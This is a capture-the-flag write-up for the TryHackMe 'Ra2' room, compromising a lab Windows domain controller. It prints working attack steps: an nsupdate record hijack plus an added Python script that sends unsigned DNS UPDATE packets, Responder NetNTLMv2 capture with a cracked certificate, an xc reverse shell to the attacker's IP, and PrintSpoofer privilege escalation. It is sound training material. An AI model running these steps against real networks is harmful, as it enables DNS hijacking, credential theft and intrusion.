Ra2

Just when they thought their hashes were safe…

Difficulty: Hard

Room: Ra2

Created by: 4ndr34zz and theart42

__init__

Story

WindCorp recently had a security breach. Since then they have hardened their infrastructure, learning from their mistakes. But maybe not enough? You have managed to enter their local network…

Happy Hacking!

Created by @4nqr34z and @theart42

(Give it at least 5 minutes to boot)


So from the description we see WindCorp is back for more. I really enjoyed the Ra room and Set, so when I saw this sequel come out I was pumped. I’m a sucker for hacking on Windows and I knew this room would be fun.

This challenge reminded me how easy it is to pass over things like DNS. You’ll notice that without enumerating DNS you won’t get very far. This challenge had a few pieces that all had to come together before being able to make any movement.


enumeration

Off the bat we’ll use Threader3000 to see what ports are open.

Shout out to the mayor. I appreciate all the work he puts in with educational content and assisting people in the community.
PyPI project: Threader3000
Github repo: Threader3000
Twitch: https://www.twitch.tv/themayor11

threader3000

🚀 threader3000
--------------------------------------------------
Python Port Scanner 3000
A project by The Mayor/Dievus
--------------------------------------------------
Enter your target IP address or URL here: 10.10.165.58
--------------------------------------------------
Scanning target 10.10.165.58
Time started:
--------------------------------------------------
Port 53 is open
Port 139 is open
Port 135 is open
Port 88 is open
Port 80 is open
Port 389 is open
Port 464 is open
Port 445 is open
Port 443 is open
Port 593 is open
Port 636 is open
Port 2179 is open
Port 3268 is open
Port 3269 is open
Port 3389 is open
Port 5223 is open
Port 5270 is open
Port 5229 is open
Port 5222 is open
Port 5263 is open
Port 5262 is open
Port 5269 is open
Port 5276 is open
Port 5275 is open
Port 7070 is open
Port 7443 is open
Port 7777 is open
Port 9091 is open
Port 9090 is open
Port 9389 is open
Port 49670 is open
Port 49669 is open
Port 49668 is open
Port 49666 is open
Port 49673 is open
Port 49702 is open
Port 49694 is open
Port scan completed in 0:03:00.720537

nmap

🚀 mkdir nmap && IP=10.10.x.x

🚀 nmap -p- -T4 -sC -sV -Pn -vvv -oA nmap/scan $IP

The nmap results were pretty lengthy. Judging by the open ports (DNS on 53, Kerberos on 88, LDAP/LDAPS on 389/636, the global catalog on 3268/3269, SMB on 445, RPC on 135 and ADWS on 9389), it’s safe to assume this is a domain controller. If you’ve done Ra you’ll also notice the hostname fire looks familiar. In the nmap output we also find a few more hostnames:

  • fire.windcorp.thm
  • selfservice.windcorp.thm
  • selfservice.dev.windcorp.thm

Let’s add these to our /etc/hosts.


It’s always DNS

There’s an old saying that often holds up… it’s always DNS. DNS misconfigurations, and even open zone transfers, are still common in the real world. I won’t be diving into DNS in this writeup, but I’ll give you a friendly reminder… it’s always DNS.

🚀 dig windcorp.thm any @$IP

/images/ra2/dig.png

The ANY query gives us our first flag and a really good hint about what we’ll need to do. With nonsecure dynamic updates allowed on the zone, any host that can reach the DNS server, domain-joined or not and with no authentication at all, can create, modify or delete records in it. Secure-only updates, the default for AD-integrated zones, require the update to be signed (GSS-TSIG) by a domain principal. Let’s do some more enumeration and see what we could do with the ability to update DNS records.

DNS Dynamic Updating Microsoft Article
nsupdate - “…used to submit Dynamic DNS Update requests as defined in RFC2136 to a name server."
If you were curious what the configuration looks like in the DNS MMC snap-in (zone Properties, General tab, the Dynamic updates drop-down):
/images/ra2/secure-dns.png


dirsearch

/images/ra2/fire-homepage.png
🚀 dirsearch.py -u https://fire.windcorp.thm -E -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -l -t 100 -x 400

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 100 | Wordlist size: 209422 | Request count: 209422

Error Log: /opt/dirsearch/logs/errors-20-08-15_10-25-18.log

Target: https://fire.windcorp.thm

Output File: /opt/dirsearch/reports/fire.windcorp.thm/20-08-15_10-25-19

[10:25:19] Starting:
[10:25:25] 200 -   12KB - /
[10:25:25] 301 -  153B  - /img  ->  https://fire.windcorp.thm/img/
[10:25:26] 301 -  153B  - /css  ->  https://fire.windcorp.thm/css/
[10:25:28] 301 -  156B  - /vendor  ->  https://fire.windcorp.thm/vendor/
[10:28:50] 302 -  165B  - /powershell  ->  /powershell/default.aspx?ReturnUrl=%2fpowershell

/powershell

/powershell? Navigating to the page we can see this is Microsoft’s PowerShell Web Access (PSWA), a web front end to a PowerShell session on the box. I was unable to find any known vulnerabilities in this web app so I moved on. We’ll come back to it when we get some credentials.

/images/ra2/powershell-web1.png

selfservice

We see a few more hints on the homepage in the message from the management team: they are now using certificates everywhere, and a new self-service portal is being developed. There’s a selfservice button on the homepage.

Testing the happy path for self-service doesn’t yield anything noteworthy. Intercepting the requests in Burp we see an NTLMSSP challenge/response exchange. Base64-decoding the NTLM messages doesn’t leak anything new, like another hostname.

/images/ra2/burp1.png

Time to check out the dev site.


selfservice-dev

Navigating to the webpage we’re greeted with an under construction landing page. Nothing special in the source, and I wasn’t expecting something ‘CTF-y’ like that for this room.

/images/ra2/dev-home.png

dirsearch pt2

🚀 dirsearch.py -u https://selfservice.dev.windcorp.thm -E -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -l -t 100 -x 400

 _|. _ _  _  _  _ _|_    v0.3.9
(_||| _) (/_(_|| (_| )

Extensions:  | HTTP method: GET | Suffixes: php, asp, aspx, jsp, js, do, action, html, json, yml, yaml, xml, cfg, bak, txt, md, sql, zip, tar.gz, tgz | Threads: 100 | Wordlist size: 209422 | Request count: 209422

Error Log: /opt/dirsearch/logs/errors-20-08-15_11-24-57.log

Target: https://selfservice.dev.windcorp.thm

Output File: /opt/dirsearch/reports/selfservice.dev.windcorp.thm/20-08-15_11-24-57

[11:24:57] Starting:
[11:25:03] 200 -  106B  - /
[11:25:06] 301 -  167B  - /backup  ->  https://selfservice.dev.windcorp.thm/backup/

Shortly after starting the fuzzing we see there’s a /backup directory. Navigating to it there are two files, cert.pfx and web.config. Let’s download them locally. Nothing of interest in web.config.

/images/ra2/backup.png

pfx2john

A .pfx is a PKCS#12 bundle: the certificate plus its private key, wrapped with a password. pfx2john converts that password protection into a hash john can attack offline.

🚀 pfx2john.py cert.pfx > hash

Crack it with john:

🚀 john hash --wordlist=/opt/rockyou.txt

Now we can pull the private key and the certificate out of cert.pfx with openssl, using the password we cracked with john (-nodes writes the key unencrypted; if OpenSSL 3.x refuses the file’s legacy ciphers, add -legacy).

Private key: 🚀 openssl pkcs12 -in cert.pfx -nocerts -out key.pem -nodes

/images/ra2/private-key.png

Certificate (the public half): 🚀 openssl pkcs12 -in cert.pfx -out crt.pem -clcerts -nokeys

/images/ra2/public-key.png

nsupdate

Since the zone accepts nonsecure updates, nsupdate works from our unjoined machine without any credentials. We’ll send a request to delete the existing A record for selfservice.windcorp.thm, then an update that adds a new A record so selfservice resolves to our THM VPN IP (tun0).

nsupdate man page

🚀 nsupdate
> server 10.10.114.83
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm 1234 A 10.x.x.x
> send
> quit

dig

Let’s query the DNS server to see if selfservice.windcorp.thm now resolves to our THM IP when a client requests a lookup.

🚀 dig selfservice.windcorp.thm @10.10.114.83

/images/ra2/a.png
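As an added example (my own code, not the author’s and not part of the original writeup), here is the same delete-then-add update built by hand as a single RFC 2136 UPDATE message in Python, so you can see what nsupdate actually puts on the wire: a zone section naming windcorp.thm, a "delete all RRsets at this name" update and an "add A" update. The zone, the victim name and the 10.8.0.2 callback address are assumed values; the send_update function only fires if you pass a server IP on the command line.

```python
import random
import socket
import struct
import sys

# RR types / classes used by RFC 2136 UPDATE messages
TYPE_A, TYPE_SOA, TYPE_ANY = 1, 6, 255
CLASS_IN, CLASS_ANY = 1, 255
OPCODE_UPDATE = 5
RCODES = {0: "NOERROR", 1: "FORMERR", 2: "SERVFAIL", 5: "REFUSED", 9: "NOTAUTH", 10: "NOTZONE"}


def encode_name(name: str) -> bytes:
    """Wire-format (uncompressed) domain name: length-prefixed labels, zero terminator."""
    out = b"".join(bytes([len(label)]) + label.encode() for label in name.rstrip(".").split("."))
    return out + b"\x00"


def decode_name(msg: bytes, off: int):
    labels = []
    while msg[off]:
        n = msg[off]
        labels.append(msg[off + 1:off + 1 + n].decode())
        off += 1 + n
    return ".".join(labels), off + 1


def rr(name: str, rtype: int, rclass: int, ttl: int, rdata: bytes) -> bytes:
    return encode_name(name) + struct.pack("!HHIH", rtype, rclass, ttl, len(rdata)) + rdata


def build_update(zone: str, fqdn: str, new_ip: str, ttl: int = 1234, msg_id=None) -> bytes:
    """One UPDATE message doing what the two nsupdate 'send's above did."""
    msg_id = random.randrange(0x10000) if msg_id is None else msg_id
    flags = OPCODE_UPDATE << 11                      # QR=0, Opcode=UPDATE, no other flags
    updates = [
        rr(fqdn, TYPE_ANY, CLASS_ANY, 0, b""),       # "delete all RRsets from a name" (RFC 2136 2.5.3)
        rr(fqdn, TYPE_A, CLASS_IN, ttl, socket.inet_aton(new_ip)),  # then add our A record
    ]
    # ZOCOUNT=1, PRCOUNT=0 (no prerequisites), UPCOUNT=2, ADCOUNT=0 (no TSIG, which is the whole point)
    header = struct.pack("!HHHHHH", msg_id, flags, 1, 0, len(updates), 0)
    zone_section = encode_name(zone) + struct.pack("!HH", TYPE_SOA, CLASS_IN)
    return header + zone_section + b"".join(updates)


def parse_header(msg: bytes) -> dict:
    msg_id, flags, zo, pr, up, ad = struct.unpack("!HHHHHH", msg[:12])
    return {"id": msg_id, "qr": flags >> 15, "opcode": (flags >> 11) & 0xF, "rcode": flags & 0xF,
            "zocount": zo, "prcount": pr, "upcount": up, "adcount": ad}


def decode_update(msg: bytes):
    """Walk our own (uncompressed) UPDATE back into (zone, [(name, type, class, ttl, rdata)])."""
    hdr = parse_header(msg)
    zone, off = decode_name(msg, 12)
    off += 4                                         # skip zone type/class
    rrs = []
    for _ in range(hdr["upcount"]):
        name, off = decode_name(msg, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata = msg[off:off + rdlen]
        off += rdlen
        if rtype == TYPE_A and rdlen == 4:
            rdata = socket.inet_ntoa(rdata)
        rrs.append((name, rtype, rclass, ttl, rdata))
    return zone, rrs


def send_update(server: str, packet: bytes, timeout: float = 3.0) -> str:
    """Send the update to UDP/53 and return the server's RCODE name."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(packet, (server, 53))
        reply, _ = s.recvfrom(512)
    hdr = parse_header(reply)
    return RCODES.get(hdr["rcode"], str(hdr["rcode"]))


if __name__ == "__main__":
    # Assumed values: the zone, the name we hijack and our tun0 address
    pkt = build_update("windcorp.thm", "selfservice.windcorp.thm", "10.8.0.2")
    print(decode_update(pkt))
    if len(sys.argv) > 1:                            # python3 dns_update.py <dns server ip>
        print("server said:", send_update(sys.argv[1], pkt))
```

The reply’s RCODE is the check worth keeping: a zone set to Secure only rejects this unsigned update (typically REFUSED), whereas the Ra2 zone answers NOERROR, which is exactly the weakness the TXT hint pointed at.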

Responder

Before you start Responder, copy the key.pem and crt.pem extracted from the PFX to /usr/share/responder/certs, or wherever the certs directory lives in your install.

/images/ra2/cp.png

We’ll want to edit Responder.conf so the HTTPS server uses them (the SSLCert and SSLKey entries under [HTTPS Server]). This is the whole point of cracking the PFX: the client that connects to selfservice.windcorp.thm expects the real certificate, and without it the TLS handshake fails before any NTLM authentication happens.

/images/ra2/responder-config.png

Fire up responder to listen on tun0

🚀 responder -I tun0

/images/ra2/responder.png

We capture a NetNTLMv2 response from the client that connects to selfservice.windcorp.thm.


crack the hash

Save the hash and crack it with your tool of choice (john’s format is netntlmv2, hashcat’s mode is 5600). I used john.

/images/ra2/ntlmv2.png

PS web access

We can log in with the user’s credentials.

/images/ra2/powershell-web2.png

We find flag 2. From here I opted to get a real shell but you could finish the privesc from the web shell.

/images/ra2/flag2.png

xc by xct

https://github.com/xct/xc

I’ve been meaning to try xct’s xc, a ‘netcat like reverse shell for linux and windows’. I’ve heard good things about it, and after using it I’ve been really enjoying it.

That said you could also just do everything through the webshell, use netcat, etc. Do you! 😁️

updog

https://github.com/sc0tfree/updog

pip3 install updog

I’m going to use updog as my web server to transfer files. I think it’s a nice replacement for the standard Python simple HTTP server, with features like TLS transport, password protection, a web UI, and the ability to upload data to the server. I hacked together something similar a few months ago but it’s nowhere near as polished as this… and look at the logo!

privesc

options

itm4n - PrintSpoofer - Abusing Impersonation Privileges on Windows 10 and Server 2019

Here are a couple of options to privesc. I chose to compile PrintSpoofer from itm4n.

  • Use PrintSpoofer
  • Use SweetPotato, a collection of native Windows privilege escalation techniques from service accounts to SYSTEM. This requires you to compile the executable yourself.
  • Use a compiled PrintSpoofer.exe from the Mayor’s GitHub.

One of the first things I like to do when I get a shell is run whoami /all. We see SeImpersonatePrivilege is enabled, which immediately points to the potato family: RoguePotato and PrintSpoofer both coerce a SYSTEM process into authenticating to a named pipe we control and then impersonate that token.

/images/ra2/whoami.png

From here we can upload one of the exploits below. Start an xc or netcat listener then run one of the exploits.


printspoofer.exe

Here’s an example of using PrintSpoofer.exe to run an argumentless xc client as SYSTEM (-c is PrintSpoofer’s “run this command” option; the xc client reads its callback IP and port from its own filename, so it needs no arguments). Not having to use arguments is such a cool idea.

PS C:\Users\user.WINDCORP\Documents> .\PrintSpoofer.exe -c xc_10.x.x.x_9001.exe
/images/ra2/xc2.png

sweet potato

Somebody who finished the room mentioned they had used https://github.com/CCob/SweetPotato. I tested it and it worked for me as well.

/images/ra2/sweet.png

flag 3

/images/ra2/flag3.png

/etc/takeaways

I wasn’t planning on making a writeup for this room as I’ve been busy cramming for the OSCP exam but I thought I’d put something together. Thanks 4ndr34zz and theart42 for another great room!